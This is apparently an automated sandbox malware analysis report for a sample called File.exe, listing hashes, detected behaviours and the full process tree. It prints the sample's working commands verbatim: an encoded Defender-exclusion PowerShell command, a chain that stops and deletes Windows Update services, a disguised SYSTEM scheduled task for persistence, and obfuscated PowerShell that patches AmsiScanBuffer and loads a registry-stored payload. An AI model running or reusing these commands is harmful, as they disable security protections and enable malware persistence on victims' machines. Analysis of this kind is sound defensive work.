Analysis
-
max time kernel
35s -
max time network
104s -
platform
windows10-2004_x64 -
resource
win10v2004-20220414-en -
submitted
05-05-2022 00:53
Static task
static1
Behavioral task
behavioral1
Sample
File.exe
Resource
win7-20220414-en
General
-
Target
File.exe
-
Size
4.0MB
-
MD5
f74ccaec9935cca19122478058c39f79
-
SHA1
5dbffbe85764d0bd43a90a1ef8eb8d8c5a540527
-
SHA256
8d2d9d8d937c880d75eb1e4a930f273a0b215ba1b15c07c10a7d902f23b0b08a
-
SHA512
2cb3379d4c37b2d74f3ae51a0cc0551eb146e5ff6822b0b76e15c63d9f6bd116ed569a5a72cd8be2c37695bfa5cb9ebdd08e27803a9d19cadcc6315b2ebde6ef
Malware Config
Signatures
-
Modifies security service 2 TTPs 5 IoCs
Processes:
reg.exedescription ioc process Key deleted \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\wuauserv\TriggerInfo\0 reg.exe Key deleted \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\wuauserv\TriggerInfo\1 reg.exe Key deleted \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\wuauserv\TriggerInfo reg.exe Key deleted \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\wuauserv\Parameters reg.exe Key deleted \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\wuauserv\Security reg.exe -
Executes dropped EXE 2 IoCs
Processes:
[New]344334.exeger.exepid process 1060 [New]344334.exe 1112 ger.exe -
Possible privilege escalation attempt 2 IoCs
Processes:
takeown.exeicacls.exepid process 3740 takeown.exe 2600 icacls.exe -
Stops running service(s) 3 TTPs
-
Checks computer location settings 2 TTPs 1 IoCs
Looks up country code configured in the registry, likely geofence.
Processes:
[New]344334.exedescription ioc process Key value queried \REGISTRY\USER\S-1-5-21-3751123196-3323558407-1869646069-1000\Control Panel\International\Geo\Nation [New]344334.exe -
Modifies file permissions 1 TTPs 2 IoCs
Processes:
takeown.exeicacls.exepid process 3740 takeown.exe 2600 icacls.exe -
Looks up external IP address via web service 1 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
Processes:
flow ioc 6 ip-api.com -
Suspicious use of SetThreadContext 2 IoCs
Processes:
ger.exe[New]344334.exedescription pid process target process PID 1112 set thread context of 1812 1112 ger.exe AppLaunch.exe PID 1060 set thread context of 1408 1060 [New]344334.exe conhost.exe -
Drops file in Windows directory 4 IoCs
Processes:
conhost.exedescription ioc process File created C:\Windows\Tasks\dialersvc32.job conhost.exe File opened for modification C:\Windows\Tasks\dialersvc32.job conhost.exe File created C:\Windows\Tasks\dialersvc64.job conhost.exe File opened for modification C:\Windows\Tasks\dialersvc64.job conhost.exe -
Launches sc.exe
Sc.exe is a Windows utlilty to control services on the system.
-
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
Creates scheduled task(s) 1 TTPs 1 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
-
Modifies registry key 1 TTPs 9 IoCs
Processes:
reg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exepid process 1472 reg.exe 1108 reg.exe 372 reg.exe 2796 reg.exe 3476 reg.exe 3768 reg.exe 3472 reg.exe 2732 reg.exe 1580 reg.exe -
Suspicious behavior: EnumeratesProcesses 3 IoCs
Processes:
powershell.exe[New]344334.exepid process 4392 powershell.exe 4392 powershell.exe 1060 [New]344334.exe -
Suspicious use of AdjustPrivilegeToken 3 IoCs
Processes:
powershell.exeAppLaunch.exe[New]344334.exedescription pid process Token: SeDebugPrivilege 4392 powershell.exe Token: SeDebugPrivilege 1812 AppLaunch.exe Token: SeDebugPrivilege 1060 [New]344334.exe -
Suspicious use of WriteProcessMemory 49 IoCs
Processes:
File.exeger.exe[New]344334.execmd.execmd.execmd.exedescription pid process target process PID 2736 wrote to memory of 1060 2736 File.exe [New]344334.exe PID 2736 wrote to memory of 1060 2736 File.exe [New]344334.exe PID 2736 wrote to memory of 1112 2736 File.exe ger.exe PID 2736 wrote to memory of 1112 2736 File.exe ger.exe PID 2736 wrote to memory of 1112 2736 File.exe ger.exe PID 1112 wrote to memory of 1812 1112 ger.exe AppLaunch.exe PID 1112 wrote to memory of 1812 1112 ger.exe AppLaunch.exe PID 1112 wrote to memory of 1812 1112 ger.exe AppLaunch.exe PID 1112 wrote to memory of 1812 1112 ger.exe AppLaunch.exe PID 1112 wrote to memory of 1812 1112 ger.exe AppLaunch.exe PID 1060 wrote to memory of 4124 1060 [New]344334.exe cmd.exe PID 1060 wrote to memory of 4124 1060 [New]344334.exe cmd.exe PID 4124 wrote to memory of 4392 4124 cmd.exe powershell.exe PID 4124 wrote to memory of 4392 4124 cmd.exe powershell.exe PID 1060 wrote to memory of 4888 1060 [New]344334.exe cmd.exe PID 1060 wrote to memory of 4888 1060 [New]344334.exe cmd.exe PID 4888 wrote to memory of 4528 4888 cmd.exe sc.exe PID 4888 wrote to memory of 4528 4888 cmd.exe sc.exe PID 4888 wrote to memory of 864 4888 cmd.exe sc.exe PID 4888 wrote to memory of 864 4888 cmd.exe sc.exe PID 1060 wrote to memory of 1408 1060 [New]344334.exe conhost.exe PID 1060 wrote to memory of 1408 1060 [New]344334.exe conhost.exe PID 1060 wrote to memory of 1408 1060 [New]344334.exe conhost.exe PID 1060 wrote to memory of 1408 1060 [New]344334.exe conhost.exe PID 1060 wrote to memory of 1408 1060 [New]344334.exe conhost.exe PID 4888 wrote to memory of 3284 4888 cmd.exe sc.exe PID 1060 wrote to memory of 1408 1060 [New]344334.exe conhost.exe PID 4888 wrote to memory of 3284 4888 cmd.exe sc.exe PID 1060 wrote to memory of 1408 1060 [New]344334.exe conhost.exe PID 1060 wrote to memory of 1408 1060 [New]344334.exe conhost.exe PID 1060 wrote to memory of 1408 1060 [New]344334.exe conhost.exe PID 1060 wrote to memory of 1408 1060 [New]344334.exe conhost.exe PID 1060 wrote to memory of 1408 1060 [New]344334.exe conhost.exe PID 4888 wrote to memory of 4520 4888 cmd.exe sc.exe PID 4888 wrote to memory of 4520 4888 cmd.exe sc.exe PID 4888 wrote to memory of 4904 4888 cmd.exe sc.exe PID 4888 wrote to memory of 4904 4888 cmd.exe sc.exe PID 4888 wrote to memory of 2796 4888 cmd.exe reg.exe PID 4888 wrote to memory of 2796 4888 cmd.exe reg.exe PID 4888 wrote to memory of 1580 4888 cmd.exe reg.exe PID 4888 wrote to memory of 1580 4888 cmd.exe reg.exe PID 4888 wrote to memory of 1472 4888 cmd.exe reg.exe PID 4888 wrote to memory of 1472 4888 cmd.exe reg.exe PID 1060 wrote to memory of 2416 1060 [New]344334.exe cmd.exe PID 1060 wrote to memory of 2416 1060 [New]344334.exe cmd.exe PID 4888 wrote to memory of 1108 4888 cmd.exe reg.exe PID 4888 wrote to memory of 1108 4888 cmd.exe reg.exe PID 2416 wrote to memory of 3840 2416 cmd.exe schtasks.exe PID 2416 wrote to memory of 3840 2416 cmd.exe schtasks.exe
Processes
-
C:\Users\Admin\AppData\Local\Temp\File.exe"C:\Users\Admin\AppData\Local\Temp\File.exe"1⤵
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\AppData\Roaming\[New]344334.exeC:\Users\Admin\AppData\Roaming\[New]344334.exe2⤵
- Executes dropped EXE
- Checks computer location settings
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" cmd /c powershell -EncodedCommand "PAAjAG0AaQAjAD4AIABBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHoAdwBsAHEAIwA+ACAALQBFAHgAYwBsAHUAcwBpAG8AbgBQAGEAdABoACAAQAAoACQAZQBuAHYAOgBVAHMAZQByAFAAcgBvAGYAaQBsAGUALAAkAGUAbgB2ADoAUwB5AHMAdABlAG0ARAByAGkAdgBlACkAIAA8ACMAaABxAGwAbAAjAD4AIAAtAEYAbwByAGMAZQAgADwAIwBqAGgAIwA+AA=="3⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -EncodedCommand "PAAjAG0AaQAjAD4AIABBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHoAdwBsAHEAIwA+ACAALQBFAHgAYwBsAHUAcwBpAG8AbgBQAGEAdABoACAAQAAoACQAZQBuAHYAOgBVAHMAZQByAFAAcgBvAGYAaQBsAGUALAAkAGUAbgB2ADoAUwB5AHMAdABlAG0ARAByAGkAdgBlACkAIAA8ACMAaABxAGwAbAAjAD4AIAAtAEYAbwByAGMAZQAgADwAIwBqAGgAIwA+AA=="4⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" cmd /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc & reg delete HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc /f & reg delete HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc /f & reg delete HKLM\SYSTEM\CurrentControlSet\Services\wuauserv /f & reg delete HKLM\SYSTEM\CurrentControlSet\Services\bits /f & reg delete HKLM\SYSTEM\CurrentControlSet\Services\dosvc /f & takeown /f %SystemRoot%\System32\WaaSMedicSvc.dll & icacls %SystemRoot%\System32\WaaSMedicSvc.dll /grant *S-1-1-0:F /t /c /l /q & rename %SystemRoot%\System32\WaaSMedicSvc.dll WaaSMedicSvc_BAK.dll & reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v AUOptions /d 2 /t REG_DWORD /f & reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v AutoInstallMinorUpdates /d 0 /t REG_DWORD /f & reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v NoAutoUpdate /d 1 /t REG_DWORD /f & reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v NoAutoRebootWithLoggedOnUsers /d 1 /t REG_DWORD /f & SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\Automatic App Update" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\Scheduled Start" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\sih" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\sihboot" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistant" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistantCalendarRun" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistantWakeupRun" /DISABLE3⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\sc.exesc stop UsoSvc4⤵
-
C:\Windows\system32\sc.exesc stop WaaSMedicSvc4⤵
-
C:\Windows\system32\sc.exesc stop wuauserv4⤵
-
C:\Windows\system32\sc.exesc stop bits4⤵
-
C:\Windows\system32\sc.exesc stop dosvc4⤵
-
C:\Windows\system32\reg.exereg delete HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc /f4⤵
- Modifies registry key
-
C:\Windows\system32\reg.exereg delete HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc /f4⤵
- Modifies registry key
-
C:\Windows\system32\reg.exereg delete HKLM\SYSTEM\CurrentControlSet\Services\wuauserv /f4⤵
- Modifies security service
- Modifies registry key
-
C:\Windows\system32\reg.exereg delete HKLM\SYSTEM\CurrentControlSet\Services\dosvc /f4⤵
- Modifies registry key
-
C:\Windows\system32\reg.exereg delete HKLM\SYSTEM\CurrentControlSet\Services\bits /f4⤵
- Modifies registry key
-
C:\Windows\system32\takeown.exetakeown /f C:\Windows\System32\WaaSMedicSvc.dll4⤵
- Possible privilege escalation attempt
- Modifies file permissions
-
C:\Windows\system32\icacls.exeicacls C:\Windows\System32\WaaSMedicSvc.dll /grant *S-1-1-0:F /t /c /l /q4⤵
- Possible privilege escalation attempt
- Modifies file permissions
-
C:\Windows\system32\reg.exereg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v AUOptions /d 2 /t REG_DWORD /f4⤵
- Modifies registry key
-
C:\Windows\system32\reg.exereg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v AutoInstallMinorUpdates /d 0 /t REG_DWORD /f4⤵
- Modifies registry key
-
C:\Windows\system32\reg.exereg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v NoAutoUpdate /d 1 /t REG_DWORD /f4⤵
- Modifies registry key
-
C:\Windows\system32\reg.exereg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v NoAutoRebootWithLoggedOnUsers /d 1 /t REG_DWORD /f4⤵
- Modifies registry key
-
C:\Windows\system32\schtasks.exeSCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\Automatic App Update" /DISABLE4⤵
-
C:\Windows\system32\schtasks.exeSCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\Scheduled Start" /DISABLE4⤵
-
C:\Windows\system32\schtasks.exeSCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\sih" /DISABLE4⤵
-
C:\Windows\system32\schtasks.exeSCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\sihboot" /DISABLE4⤵
-
C:\Windows\system32\schtasks.exeSCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistant" /DISABLE4⤵
-
C:\Windows\System32\conhost.exeC:\Windows\System32\conhost.exe3⤵
- Drops file in Windows directory
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" cmd /c schtasks /create /f /sc onlogon /rl highest /ru "System" /tn "GoogleUpdateTaskMachineQC" /tr "C:\Users\Admin\AppData\Roaming\Chrome\chrome.exe"3⤵
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\AppData\Roaming\ger.exeC:\Users\Admin\AppData\Roaming\ger.exe2⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Suspicious use of WriteProcessMemory
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe"3⤵
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\schtasks.exeschtasks /create /f /sc onlogon /rl highest /ru "System" /tn "GoogleUpdateTaskMachineQC" /tr "C:\Users\Admin\AppData\Roaming\Chrome\chrome.exe"1⤵
- Creates scheduled task(s)
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXEC:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE "function Local:lVTIsoRZRqKU{Param([OutputType([Type])][Parameter(Position=0)][Type[]]$oNtXvxywUVRgJv,[Parameter(Position=1)][Type]$rKtabXulif)$zFGApgSdGBc=[AppDomain]::CurrentDomain.DefineDynamicAssembly((New-Object Reflection.AssemblyName('ReflectedDelegate')),[Reflection.Emit.AssemblyBuilderAccess]::Run).DefineDynamicModule('InMe'+'mory'+'Module',$False).DefineType('MyDelegateType','Class,Public,Sealed,AnsiClass,AutoClass',[MulticastDelegate]);$zFGApgSdGBc.DefineConstructor('RTSpecialName,HideBySig,Public',[Reflection.CallingConventions]::Standard,$oNtXvxywUVRgJv).SetImplementationFlags('Runtime,Managed');$zFGApgSdGBc.DefineMethod('Invoke','Public,HideBySig,NewSlot,Virtual',$rKtabXulif,$oNtXvxywUVRgJv).SetImplementationFlags('Runtime,Managed');Write-Output $zFGApgSdGBc.CreateType();}$JhwOJVEAiVVwR=([AppDomain]::CurrentDomain.GetAssemblies()|Where-Object{$_.GlobalAssemblyCache -And $_.Location.Split('\')[-1].Equals('System.dll')}).GetType('Microsoft.Win32.'+'Uns'+'afeNat'+'iveMetho'+'ds');$xOfddbeoFqhbay=$JhwOJVEAiVVwR.GetMethod('Ge'+'tPr'+'ocAdd'+'ress',[Reflection.BindingFlags]'Public,Static',$Null,[Reflection.CallingConventions]::Any,@((New-Object IntPtr).GetType(),[string]),$Null);$DYGbAdGLupiEkdXSGOb=lVTIsoRZRqKU @([String])([IntPtr]);$sVLaknzcJUuGExbgYQpIic=lVTIsoRZRqKU @([IntPtr],[UIntPtr],[UInt32],[UInt32].MakeByRefType())([Bool]);$ilvMzbTfdKj=$JhwOJVEAiVVwR.GetMethod('Get'+'Modu'+'leHan'+'dle').Invoke($Null,@([Object]('kern'+'el'+'32.dll')));$rvcBGlJtehUFtV=$xOfddbeoFqhbay.Invoke($Null,@([Object]$ilvMzbTfdKj,[Object]('Load'+'LibraryA')));$yCNifzSrkWPPrCwvG=$xOfddbeoFqhbay.Invoke($Null,@([Object]$ilvMzbTfdKj,[Object]('Vir'+'tual'+'Pro'+'tect')));$egncJue=[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($rvcBGlJtehUFtV,$DYGbAdGLupiEkdXSGOb).Invoke('a'+'m'+'si.dll');$TxOxABytDoWgRqiaO=$xOfddbeoFqhbay.Invoke($Null,@([Object]$egncJue,[Object]('Ams'+'iSc'+'an'+'Buffer')));$uNYhusJwqL=0;[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($yCNifzSrkWPPrCwvG,$sVLaknzcJUuGExbgYQpIic).Invoke($TxOxABytDoWgRqiaO,[uint32]8,4,[ref]$uNYhusJwqL);[Runtime.InteropServices.Marshal]::Copy([Byte[]](0xb8,0x57,0,7,0x80,0xc3),0,$TxOxABytDoWgRqiaO,6);[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($yCNifzSrkWPPrCwvG,$sVLaknzcJUuGExbgYQpIic).Invoke($TxOxABytDoWgRqiaO,[uint32]8,0x20,[ref]$uNYhusJwqL);[Reflection.Assembly]::Load([Microsoft.Win32.Registry]::LocalMachine.OpenSubkey('SOFTWARE').GetValue('dialerstager')).EntryPoint.Invoke($Null,$Null)"1⤵
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.EXEC:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.EXE "function Local:qphSYtDgPUaQ{Param([OutputType([Type])][Parameter(Position=0)][Type[]]$pzBvKOYRmCWSDL,[Parameter(Position=1)][Type]$EFAgYYdLQk)$LHrGksefxuy=[AppDomain]::CurrentDomain.DefineDynamicAssembly((New-Object Reflection.AssemblyName('ReflectedDelegate')),[Reflection.Emit.AssemblyBuilderAccess]::Run).DefineDynamicModule('InMe'+'mory'+'Module',$False).DefineType('MyDelegateType','Class,Public,Sealed,AnsiClass,AutoClass',[MulticastDelegate]);$LHrGksefxuy.DefineConstructor('RTSpecialName,HideBySig,Public',[Reflection.CallingConventions]::Standard,$pzBvKOYRmCWSDL).SetImplementationFlags('Runtime,Managed');$LHrGksefxuy.DefineMethod('Invoke','Public,HideBySig,NewSlot,Virtual',$EFAgYYdLQk,$pzBvKOYRmCWSDL).SetImplementationFlags('Runtime,Managed');Write-Output $LHrGksefxuy.CreateType();}$UklPrTtCvXAKE=([AppDomain]::CurrentDomain.GetAssemblies()|Where-Object{$_.GlobalAssemblyCache -And $_.Location.Split('\')[-1].Equals('System.dll')}).GetType('Microsoft.Win32.'+'Uns'+'afeNat'+'iveMetho'+'ds');$bFZCgPJLQpMWSL=$UklPrTtCvXAKE.GetMethod('Ge'+'tPr'+'ocAdd'+'ress',[Reflection.BindingFlags]'Public,Static',$Null,[Reflection.CallingConventions]::Any,@((New-Object IntPtr).GetType(),[string]),$Null);$qjwnZVgfYGEyIpNUFFm=qphSYtDgPUaQ @([String])([IntPtr]);$IAgXyeDeeKECVmKCzpfTCx=qphSYtDgPUaQ @([IntPtr],[UIntPtr],[UInt32],[UInt32].MakeByRefType())([Bool]);$fubcAluVegA=$UklPrTtCvXAKE.GetMethod('Get'+'Modu'+'leHan'+'dle').Invoke($Null,@([Object]('kern'+'el'+'32.dll')));$bpUYEuNEPdZgDQ=$bFZCgPJLQpMWSL.Invoke($Null,@([Object]$fubcAluVegA,[Object]('Load'+'LibraryA')));$zjogMWqNOZffxSuYf=$bFZCgPJLQpMWSL.Invoke($Null,@([Object]$fubcAluVegA,[Object]('Vir'+'tual'+'Pro'+'tect')));$kONiRRv=[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($bpUYEuNEPdZgDQ,$qjwnZVgfYGEyIpNUFFm).Invoke('a'+'m'+'si.dll');$ygoYMPfnumwIUWRaB=$bFZCgPJLQpMWSL.Invoke($Null,@([Object]$kONiRRv,[Object]('Ams'+'iSc'+'an'+'Buffer')));$eUgBtXLZAE=0;[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($zjogMWqNOZffxSuYf,$IAgXyeDeeKECVmKCzpfTCx).Invoke($ygoYMPfnumwIUWRaB,[uint32]8,4,[ref]$eUgBtXLZAE);[Runtime.InteropServices.Marshal]::Copy([Byte[]](0xb8,0x57,0,7,0x80,0xc2,0x18,0),0,$ygoYMPfnumwIUWRaB,8);[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($zjogMWqNOZffxSuYf,$IAgXyeDeeKECVmKCzpfTCx).Invoke($ygoYMPfnumwIUWRaB,[uint32]8,0x20,[ref]$eUgBtXLZAE);[Reflection.Assembly]::Load([Microsoft.Win32.Registry]::LocalMachine.OpenSubkey('SOFTWARE').GetValue('dialerstager')).EntryPoint.Invoke($Null,$Null)"1⤵
-
C:\Windows\System32\dllhost.exeC:\Windows\System32\dllhost.exe /Processid:{6bf855c0-4fdc-4af9-90b2-9bb7e4105660}1⤵
Network
MITRE ATT&CK Matrix ATT&CK v6
Replay Monitor
Loading Replay Monitor...
Downloads
-
C:\Users\Admin\AppData\Roaming\[New]344334.exeFilesize
216.7MB
MD54c8170e025715b8a9b7138fcab2f2136
SHA1fc913d276bab173ef244b7c14b3944af1272a5e8
SHA256926ad6cb6c78a443dcfd64c7ad79284586971b0790c1216c930d9f832db301ca
SHA512ce46c4eac110bb0dbf757c6e60b37a7eb09fafe76c734567e02e3e6c0bf8a0aeddf1012969de178c79abd5d9850d834a30e07f144f26e544d3d6c26c9b519ff3
-
C:\Users\Admin\AppData\Roaming\[New]344334.exeFilesize
218.2MB
MD5cdd91fb1232cb1e2bd51e5d9af14c2b0
SHA1a8761ce93218ed85160baf2d8d18ffe54889ad94
SHA2564634c002868ec687c62c013799fd18a3ad9854c3542a4863014ed7c5dc27b7c4
SHA512b886db275eacc66f3315cd88fb889f2bbfc7cbece391baeccd454a7cc6e4ba8fb5dfccd9b026b042ebfc582f1b71e9be83147087f8b621671668ae9c45dde87b
-
C:\Users\Admin\AppData\Roaming\ger.exeFilesize
1.9MB
MD5ebc48d85bce66e7534e695c2eb990fc7
SHA1de42ec460cbcee1d8d1629d41d0764eb16799361
SHA25632fb10396b6c9644eff88481e1ee9cd59c16d4d19848b8d16f22fd4978d3817c
SHA512da1f92f12c4dbeafe088308fe03b6876fe20c9fbe7b1bc0303a6be727829f476a854df7c817832dcea0fea46d1bdfb3b4da5c9168a7032320dbf937fad93ddd8
-
C:\Users\Admin\AppData\Roaming\ger.exeFilesize
1.9MB
MD5ebc48d85bce66e7534e695c2eb990fc7
SHA1de42ec460cbcee1d8d1629d41d0764eb16799361
SHA25632fb10396b6c9644eff88481e1ee9cd59c16d4d19848b8d16f22fd4978d3817c
SHA512da1f92f12c4dbeafe088308fe03b6876fe20c9fbe7b1bc0303a6be727829f476a854df7c817832dcea0fea46d1bdfb3b4da5c9168a7032320dbf937fad93ddd8
-
memory/372-185-0x0000000000000000-mapping.dmp
-
memory/604-204-0x00007FFE32050000-0x00007FFE32060000-memory.dmpFilesize
64KB
-
memory/864-158-0x0000000000000000-mapping.dmp
-
memory/1008-186-0x0000000000000000-mapping.dmp
-
memory/1060-135-0x0000000000D80000-0x0000000000FC8000-memory.dmpFilesize
2.3MB
-
memory/1060-136-0x00007FFE533D0000-0x00007FFE53E91000-memory.dmpFilesize
10.8MB
-
memory/1060-130-0x0000000000000000-mapping.dmp
-
memory/1060-156-0x0000000003B60000-0x0000000003B72000-memory.dmpFilesize
72KB
-
memory/1108-171-0x0000000000000000-mapping.dmp
-
memory/1112-141-0x0000000000BC0000-0x0000000000D9D000-memory.dmpFilesize
1.9MB
-
memory/1112-133-0x0000000000000000-mapping.dmp
-
memory/1408-169-0x0000000140000000-0x0000000140057000-memory.dmpFilesize
348KB
-
memory/1408-164-0x0000000140000000-0x0000000140057000-memory.dmpFilesize
348KB
-
memory/1408-162-0x0000000140000000-0x0000000140057000-memory.dmpFilesize
348KB
-
memory/1408-161-0x0000000140002348-mapping.dmp
-
memory/1408-160-0x0000000140000000-0x0000000140057000-memory.dmpFilesize
348KB
-
memory/1472-168-0x0000000000000000-mapping.dmp
-
memory/1580-167-0x0000000000000000-mapping.dmp
-
memory/1800-197-0x00007FFE71E60000-0x00007FFE71F1E000-memory.dmpFilesize
760KB
-
memory/1800-195-0x00007FFE71FD0000-0x00007FFE721C5000-memory.dmpFilesize
2.0MB
-
memory/1800-189-0x00007FFE71E60000-0x00007FFE71F1E000-memory.dmpFilesize
760KB
-
memory/1800-188-0x00007FFE71FD0000-0x00007FFE721C5000-memory.dmpFilesize
2.0MB
-
memory/1800-177-0x00007FFE533D0000-0x00007FFE53E91000-memory.dmpFilesize
10.8MB
-
memory/1812-150-0x0000000004E40000-0x0000000004EA6000-memory.dmpFilesize
408KB
-
memory/1812-142-0x0000000000000000-mapping.dmp
-
memory/1812-154-0x0000000005A70000-0x0000000005B02000-memory.dmpFilesize
584KB
-
memory/1812-153-0x0000000005F20000-0x00000000064C4000-memory.dmpFilesize
5.6MB
-
memory/1812-143-0x00000000005D0000-0x00000000005F2000-memory.dmpFilesize
136KB
-
memory/1860-180-0x0000000003BD0000-0x0000000003C36000-memory.dmpFilesize
408KB
-
memory/1860-181-0x0000000004B00000-0x0000000004B1E000-memory.dmpFilesize
120KB
-
memory/1860-176-0x00000000034F0000-0x0000000003526000-memory.dmpFilesize
216KB
-
memory/1860-178-0x0000000003CC0000-0x00000000042E8000-memory.dmpFilesize
6.2MB
-
memory/1860-179-0x0000000003AB0000-0x0000000003AD2000-memory.dmpFilesize
136KB
-
memory/2116-200-0x0000000000000000-mapping.dmp
-
memory/2184-203-0x0000000000000000-mapping.dmp
-
memory/2416-170-0x0000000000000000-mapping.dmp
-
memory/2600-175-0x0000000000000000-mapping.dmp
-
memory/2684-187-0x0000000000000000-mapping.dmp
-
memory/2732-184-0x0000000000000000-mapping.dmp
-
memory/2796-166-0x0000000000000000-mapping.dmp
-
memory/3284-159-0x0000000000000000-mapping.dmp
-
memory/3472-183-0x0000000000000000-mapping.dmp
-
memory/3476-173-0x0000000000000000-mapping.dmp
-
memory/3740-174-0x0000000000000000-mapping.dmp
-
memory/3768-182-0x0000000000000000-mapping.dmp
-
memory/3840-172-0x0000000000000000-mapping.dmp
-
memory/4124-147-0x0000000000000000-mapping.dmp
-
memory/4132-202-0x0000000000000000-mapping.dmp
-
memory/4392-151-0x00007FFE533D0000-0x00007FFE53E91000-memory.dmpFilesize
10.8MB
-
memory/4392-152-0x000001E67F150000-0x000001E67F172000-memory.dmpFilesize
136KB
-
memory/4392-149-0x0000000000000000-mapping.dmp
-
memory/4520-163-0x0000000000000000-mapping.dmp
-
memory/4528-157-0x0000000000000000-mapping.dmp
-
memory/4644-191-0x00000001400024C8-mapping.dmp
-
memory/4644-199-0x00007FFE71E60000-0x00007FFE71F1E000-memory.dmpFilesize
760KB
-
memory/4644-192-0x0000000140000000-0x0000000140040000-memory.dmpFilesize
256KB
-
memory/4644-196-0x0000000140000000-0x0000000140040000-memory.dmpFilesize
256KB
-
memory/4644-193-0x0000000140000000-0x0000000140040000-memory.dmpFilesize
256KB
-
memory/4644-190-0x0000000140000000-0x0000000140040000-memory.dmpFilesize
256KB
-
memory/4644-201-0x00007FFE71FD0000-0x00007FFE721C5000-memory.dmpFilesize
2.0MB
-
memory/4644-194-0x00007FFE71FD0000-0x00007FFE721C5000-memory.dmpFilesize
2.0MB
-
memory/4888-155-0x0000000000000000-mapping.dmp
-
memory/4904-165-0x0000000000000000-mapping.dmp